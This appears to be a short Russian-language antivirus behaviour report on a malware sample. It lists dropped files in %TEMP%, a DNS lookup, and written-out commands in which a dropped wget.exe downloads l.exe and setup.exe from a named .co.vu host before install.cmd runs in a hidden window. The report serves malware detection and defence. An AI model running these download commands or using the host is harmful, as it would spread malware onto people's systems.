Техническая информация
- %TEMP%\install.cmd
- %TEMP%\wget.exe
- DNS ASK le#####sbe1976.co.vu
- '%TEMP%\wget.exe' http://leicaresbe1976.co.vu/l.exe
- '%TEMP%\wget.exe' http://leicaresbe1976.co.vu/setup.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\install.cmd" " (со скрытым окном)
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\find.exe' "wget.exe"